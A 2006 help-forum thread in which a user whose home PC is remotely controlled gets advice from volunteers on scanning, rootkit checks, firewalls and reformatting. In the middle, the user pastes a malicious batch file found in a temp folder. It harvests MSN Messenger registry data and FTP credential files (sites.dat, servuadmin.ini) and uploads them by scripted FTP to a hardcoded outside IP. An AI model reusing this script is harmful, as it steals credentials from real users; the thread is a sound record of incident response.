Emergency!! Somebody is hacking me, i see them moving mouse on desktop

Trojan, or rootkit are possible, do you have something like VNC, GoToMyPc or PcAywhere, some sort of remote administration software like those? Otherwise I'd scan the PC either off-line, by removing the HD and placing it in another as a secondary drive, or you can try rootkitrevealer http://www.sysinternals.com/Utilities/RootkitRevealer.html
I prefer McAfee personally and professionally. A firewall like McAfee's or ZoneAlarm's are very good also.
Run the GRC.com sheilds up test's, if you can turn on the previous settings and see if you have a port exposed that might lead to such an occurance. https://www.grc.com/x/ne.dll?bh0bkyd2 Run the full scan (all service ports)
-rich

I have a firewall, sygate personal firewall on all computers... i am running lots of virus protection disabled all networki connections, changed settings on router, changed all passwords... ran some trojan removing software, one found a root kit.... I disabled all remote connections allowed... everything seems ok at the moment, waiting for virus protection to finsih scanning, then i might take some of your steps... just hate to have to wipe out reinstall all os's... have 3 computers in the house.....

i will defintley run that root kit revealer once the scan is done... im going to disabvle my internet again for a few moments... thanks again!!! i am still in shock over what i saw!!! pretty crazy to see someone on your desktop opening IE and moving the mouse around and stuff.... wow

Ok so on my computer runnign windows server 2003, with sygate firewall and symantec corporaste 9.0 virus protection i have a web server running and an ftp for uploading website files.... i can defintley close port 21 if needed, but i think this goes way beyond that... First off the server was not the computer with the mouse being moved around, that was just an everyday client machine... Below are the results from the main client machine... but i am thinking its showing 80 and 21 open because that is what is being port forwadered on the router in ordser to keep my buddys web sitre running, his restaurant... I also always have the server computer locvked and never saw any foul play going on on that computer.... but below are results from GRC scan

GRC Port Authority Report created on UTC: 2006-07-01 at 01:42:21

Results from scan of ports: 0-1055

    2 Ports Open
 1047 Ports Closed
    7 Ports Stealth
---------------------
 1056 Ports Tested

Ports found to be OPEN were: 21, 80

Ports found to be STEALTH were: 20, 135, 136, 137, 138, 139,
                                445

Other than what is listed above, all ports are CLOSED.

TruStealth: FAILED - NOT all tested ports were STEALTH,
                   - NO unsolicited packets were received,
                   - NO Ping reply (ICMP Echo) was received.

look at the running processes on the affected system and post them here.

To find the running processes, do one of the following;

A:
Preee Ctrl+Alt+Del
IF you get the windows security screen click task manager
Go to the process tab

B:
Press Crtl+Alt+Del
Click the process tab

eb

I agree what rpggamergirl post, must know something what's running on your OS, check everything, startup, registry, and unfamiliar/unregistered windows running program.

try using hijackthis for you to see the registry and startup programs.

I understand your reluctance to reinstall the os's, what with 3 systems. Call this a learning experience.

The thing is, you can no longer trust your system. That means the antivirus, the registry, etc.

Here's an article from Microsoft on how to recover from being hacked (http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx), and a quote from that article:

"The only way to clean a compromised system is to flatten and rebuild. That’s right. If you have a system that has been completely compromised, the only thing you can do is to flatten the system (reformat the system disk) and rebuild it from scratch (reinstall Windows and your applications)..."

I agree. Then to make your life easier in the future, get some imaging software (Ghost, Drive-Image) and once you have the systems back a ready state, image them and store the images. This will save restore time if this should happen again.

You have 3 systems, are you the only user? Are any of these systems being used by inexperienced users? If so, maybe you need to do a little "user awareness training".

Here is a link to some "Practice Safe Computing" from M$.

http://www.microsoft.com/smallbusiness/resources/technology/security.mspx

One in particular I thought applied to you is: "How to shield your network from clever hackers" (http://www.microsoft.com/smallbusiness/resources/technology/security/how_to_shield_your_network_from_clever_hackers.mspx).

It speaks to the considerable threats to which a system/network is still vulnerable after all the firewall, anti-virus and updates have been installed.

Ok so i formatted my computer and i think it was hacked again, my ip wont change even called my isp to try and have them change it, but they couldnt... anyways, i found some files in a temp folder and a hidme.exe file which hides applications from running... this was one batch file i saw in the temp folder... its defintley doing something.... anyways, anybody have a clue whats going on????



ping 127.0.0.1
ping 127.0.0.1
echo %temp%>%temp%\tempa.txt
%temp%\gsar -s:x3a -r:x0d:x0a %temp%\tempa.txt -o
set /p schijf=<%temp%\tempa.txt
del temp.txt
%schijf%:
cd %temp%


del site*.txt
del sysinf*.txt

regedit /e temp.dbf "HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger"
type temp.dbf | find "User.NET Messenger Service">sysinf.txt
dbf>>sysinf.txt
sysinfo>>sysinf.txt

type sysinf.txt | find "FIXED">sysinf2.txt
gsar -s:x3a -r:x0d:x0a -o sysinf2.txt
type sysinf2.txt | find "Drive">sysinf3.txt

:choppen
set /p currentdrive=<sysinf3.txt
echo %currentdrive%>current.txt
type current.txt | find "Drive"
if errorlevel 1 goto laatsteschijf
gsar -s"Drive " -r"" -o current.txt
set /p currentdrive=<current.txt
sed 1d sysinf3.txt>sysinf4.txt
copy /Y sysinf4.txt sysinf3.txt
echo ================================================================>>site.txt
echo ================================================================>>sate.txt
dir %currentdrive%:\sites.dat*.* /s >>site.txt
ping 127.0.0.1
ping 127.0.0.1

dir %currentdrive%:\servuadmin.ini*.* /s >>sate.txt
type site.txt | find "\">>site2.txt
type sate.txt | find "\">>sate2.txt
gsar -s"%currentdrive%":x3a  -r"999999999%currentdrive%":x3a -o site2.txt
gsar -s"%currentdrive%":x3a  -r"999999999%currentdrive%":x3a -o sate2.txt
gsar -s"999999999" -r:x0d:x0a -o site2.txt
gsar -s"999999999" -r:x0d:x0a -o sate2.txt
type site2.txt | find "\">>maps.txt
type sate2.txt | find "\">>meps.txt
del site2.txt
del site.txt
del sate.txt
del sate2.txt

ping 127.0.0.1
ping 127.0.0.1

goto choppen

:laatsteschijf
echo laatste schijf
type maps.txt | find "\"
if errorlevel 1 goto klaarmetsites
set /p pad=<maps.txt
echo "DEZE SITES.DAT KOMT UIT DE MAP %pad%">>temp.txt
type "%pad%\sites.dat">>temp.txt
sed 1d maps.txt>maps2.txt
copy /y maps2.txt maps.txt
echo ******************************************************************************************************>>temp.txt
goto laatsteschijf


:klaarmetsites
echo laatste schijf
type meps.txt | find "\"
if errorlevel 1 goto klaarmetdit
set /p pad=<meps.txt
echo "DEZE SERVUADMIN.INI (DUMPBEHEERDER-INIFILE) KOMT UIT DE MAP %pad%">>temp.txt
type "%pad%\servuadmin.ini">>temp.txt
sed 1d meps.txt>meps2.txt
copy /y meps2.txt meps.txt
echo ******************************************************************************************************>>temp.txt
goto laatsteschijf


pause
:klaarmetdit

type sysinf.txt >>temp.txt
type sysinf.txt | find "Mac Address">mac.txt
gsar -s" " -r"" -o mac.txt
gsar -s:x3a -r"" -o mac.txt
gsar -s"MacAddress" -r"" -o mac.txt
set /p mac=<mac.txt
del mac.txt
ren temp.txt %mac%.exe

echo open 62.166.34.66>todo.txt
echo user dmk>>todo.txt
echo dmk>>todo.txt
echo quote pasv>>todo.txt
echo mput %mac%.exe>>todo.txt
echo y>>todo.txt
echo **GEUPLOAD_MET_VERSIE07**>>todo.txt
echo quit>>todo.txt
ftp -s:todo.txt -n

ping 127.0.0.1
del todo.txt

echo open 62.166.34.66>todo.txt
echo user dmk>>todo.txt
echo dmk>>todo.txt
echo mput %mac%.exe>>todo.txt
echo y>>todo.txt
echo **GEUPLOAD_MET_VERSIE08**>>todo.txt
echo quit>>todo.txt
ftp -s:todo.txt -n
attrib -h *.*
del todo.txt


echo klaar
del sysinf*.txt
del %mac%.exe
del current.txt
del maps*.txt
del /F /Q *.*

If you are getting a dynamic IP fromy your ISP the only way to change the IP is to leave the computer disconnected from the internet (or off) for 8 days (that is assuming your ISP is using the standard 8 day lease for an IP address.  This way when you reconnect you should get a new IP

I can not tell you exactly what that .bat file does but I can tell you it is NOT GOOD

After you formated and reinstalled the OS did you install anything else?  If so what?

eb

As for leaving my computer unhooked for 8 days, that would be serious withdrawl!!!! not sure i could do that... I tried leaving it unhooked for 12 hours one day to renew the ip because i was told to try that, but it didnt work and that was hard :)  Anyways, The only stuff i installed where the basics, like office 2003, SYGATE personal firewall, symnatec 9.0 corporate edition, and anapod which is software for my ipod, winamp, and DVD decrypter, dvd shrink and thats it.... I did all updates and virus protection was up to date.... Not a big fan of sygate personal firewall, seems to allow a lot of incoming traffic... I say yes to some things such as ECHO REQUEST and some other stuff that i thopught was associated with windows, but maybe im accepting his incoming connection..... wow this stinks that i have to format again.... so how well does zone alarm work??? and is there a better virus protection software i should use other then symantec?? I always thougt symantec was good and basically thats how i fo8und out about this probelm, it detected a threat no as HideRUN   found  in my temp folder

C:\Documents and Settings\kwatkins\Local Settings\Temp\

HideRun.exe

When you reformated did you do a quick or full format?  Some viruses may not be wiped out by a quick format as all that does is delete the FAT table (tells the OS where the files are).  You may want to go to the HD manufacturer's website and see if they have a lowlevel format util.  This will completley clear the drive of any residual data, then reinstall the OS.

Are the apps you installing things you downloaded, or purchased, or bootlegd?  If downloaded or bootleged then the install files may be infected.  Use Symantec (with updated defs) to scan install CD's before installing anything.

eb

Also what is the name of the .bat file you mentioned above?

You might as well format again, :)

You can delete the .exes or bat files in the temp folders but you really need to find the trojan that they used to drop those files in the first place.

Yeah i might format again tonight or tomorrow, as for the programs they are all legit copies... I either got them from work or i bought them, but mopst come from work... I actually do support at work, but I guess i am not as smart as they think I am... Most of the problems I deal with are super easy, so i dont run into too many crazy problems like this.. Anyways, the name of that bat file is called start.bat   and there is also another one called startit.bat  which basically just runs the hiderun.exe file   but this is whats in that bat file  %temp%\hiderun.exe "%temp%\start.bat"    and the other one is posted above, called start.bat.... so startit.bat must be the first to run and then it loads start.bat   oy vay

The IP is of no real concern, even if it switched, some ISP's use dynamic DNS, so even if the IP changes, the name might stay the same. Besides, this program is dial-in home via MSN in my opinion, and your ip is of no consequence to it running, as long as you have a connection to the internet.
I find that McAfee is better than symantec over all, better virus detection, configurable overhead, spy-ware and mal-ware detection greater than most AV products. If you just have McAfee AV only, get ZoneAlarm (pro recommended). But the McAfee+Firewall is very very good in my opinion.
McAfee for instance detects (mid-download) these programs that Norton doesn't detect until they are run, or scanned on the HD after being downloaded.
http://ntsecurity.nu/toolbox/kerbcrack/ http://ntsecurity.nu/toolbox/klogger/  http://ntsecurity.nu/toolbox/fakegina/
http://www.oxid.it/cain.html http://www.openwall.com/john/  http://www.openwall.com/passwords/dl/pwdump/pwdump4.zip
Not that those programs have viri in them, however they could be used for "evil".

ZoneAlarm, and mcafee's firewall, not only do ingress filtering, but they also do egress filtering, which is outbound traffic monitoring.
-rich

P.S. I agree with richrumble, the IP you have is not a concern... The hack is an outbound so your system must make the contact first

eb

Another posible viruse: Backdoor.IRC.Bifrut
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.irc.bifrut.html

eb

I am tyrying zone alarm suite as of now, using the 15 day trial, i do like it better then symantechs firewall program i am using, it seems to give you a bit more info about whats going on.. It is currently scanning my computer for viruses, i noticed it has found two as of now, but the thing is, i have some network drives mapped and its scanning those as well, I didn't set up the options before i scanned and remove those drives/folders from being scanned, it's about 2 hours into the scan and just dont want to cancel it now!!! I wonder if i hit the SKIP button (supposed to cancel the scan) if that will allow me to remove those two viruses it found  or if i will have to scan C:\ again completely and then remove the viruses after scan is complete.... Hmmmmm And I did see that boohoo worm page on symantec when i first searched google about the bat file... I guess I will follow the directions and see if it did do most of those things listed on that page.... So you guys are saying that the bat file is trying to dial out?? not using my cable modem to do stuff?? if thats the case i dont even have a nodem installed... well, i dont have a phone line hooked up to it... I wonder what exactly is going on here!!!! Why me, why do people have to hack into other peoples computers...!!!

"dial out" in this case does not mean using a modem and phone lines, in this case "dial out" refers to your system making a connection to another system on the internet allowing that system to control yours.

What viruses were found?

oh and just an FYI, i left my syamntec firewall and virus protection installed along with the zone alarm suite and they all seem to be working fine together... I didnt think that would work out, but so far it is!!!

usualy does not work out

BTW if your system is alredy infected with a virus when you installed zone alarm, a scan may not be acurate

I would use Symantec's free online virus scan found at: http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=ie&venid=sym

eb

Also, I just looked at both of those virus pages on symantecs website, and nothing was found in my registry or my services that matchd the website removing instructions...

just says infections found - 2     but its still scanning, so i didnt want to stop it... im hoping it finishges pretty soon, or maybe i will try hitting the skip button and see what viruses i have

if it's scanning network drives, just disconect the network then it will stop scanning them... or the scan may crash.  (May be worth the risk)

eb

Then it may be a different virus...

eb

BAT.IRCFlood     said it removed it....

Info on bat.IRCFlood https://www.experts-exchange.com/questions/21838104/BAT-Ircflood-virus.html

yeah seems to be gone..... so i wonder if i really need to format now..... i might just to be safe... but not until tomorrow.... hmmmm

run the online virus scan from symantec, this will run with out interference from any virus that may be on your computer.  If that comes up clean I would say your system is clean.  Delete all the .bat and other files mentioned above (best to do this in safe mode).

Once you have your system stable disable system restore and reboot once (this will clear all the restore points as one of them may be infected) after rebooting it's ok to enable system restore again.

instructions for disabling sys restore are in the symantic links I posted.

eb

System restore should be turned off, then a scan made, after a reboot it's ok to turn back on, but I leave it off. McAfee vs Symantec is for a different topic, I'll make my comments there, still it boils down "to each their own", like religion. Root-kit's or "hideme's", like the one this author seems to have, will avoid detection from online scan's as well as installed AV scan's. Try RootKit revealer: http://www.sysinternals.com/Utilities/RootkitRevealer.html If possible, scan you HD in another PC, remove your HD, place in another pc as a Secondary drive, and then have that PC boot up, and scan your HD whiles it's mounted as a secondary drive.
Here is some good scary reading http://www.phrack.org/show.php?p=62&a=12
Read up on best practices and alternate browsers also http://xinn.org/win_bestpractices.html http://www.xinn.org/annoyance_spy-ware.html
-rich

ok guys, i will do follow these last instructions and and then divide the points up how i see fit, defintley giving richrumble and ebjers the most though, they did help the most i believe.. If anybody sees it differently let me know... I will probabaly divide the points tomorrow.... Just want to make sure my system ius running smoothly and what not.... Thanks again!@!!

Make sure your system is clean before you close the ? and split the points.

eb

Glad to hear everything's okay.

Thanks!